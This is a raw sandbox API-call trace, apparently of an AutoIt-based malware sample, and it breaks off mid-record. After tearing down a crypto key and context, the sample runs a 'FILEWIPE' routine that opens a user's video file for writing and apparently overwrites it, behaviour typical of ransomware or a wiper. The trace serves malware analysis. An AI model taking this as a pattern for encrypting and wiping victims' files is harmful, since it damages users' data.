0 [0042.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.842] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.845] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.845] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.845] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.845] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.846] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.846] CryptDestroyKey (hKey=0x7c2200) returned 1 [0042.846] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.846] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.846] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.846] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.846] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.846] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.846] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.846] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.847] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.847] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.847] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.847] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.847] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.847] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.848] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.848] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.848] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.848] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.848] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.848] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.849] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.849] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0042.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x65634260, ftLastWriteTime.dwHighDateTime=0x1d5b6d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x0, dwReserved1=0x777648, cFileName="23efG7fei5t7RrlH_.avi", cAlternateFileName="23EFG7~1.AVI")) returned 0x7c2240 [0042.849] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.849] CharLowerBuffW (in: lpsz="byte[67736]", cchLength=0xb | out: lpsz="byte[67736]") returned 0xb [0042.850] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.850] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.850] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.850] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.850] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.850] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.851] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.851] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.851] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.851] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.852] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.852] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\23efg7fei5t7rrlh_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0042.853] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.853] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.853] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.853] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.853] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.853] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.853] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.853] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.854] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.854] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.854] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.854] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.854] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpFilePart=0x0) returned 0x49 [0042.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x193fe5a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="23efG7fei5t7RrlH_.avi", 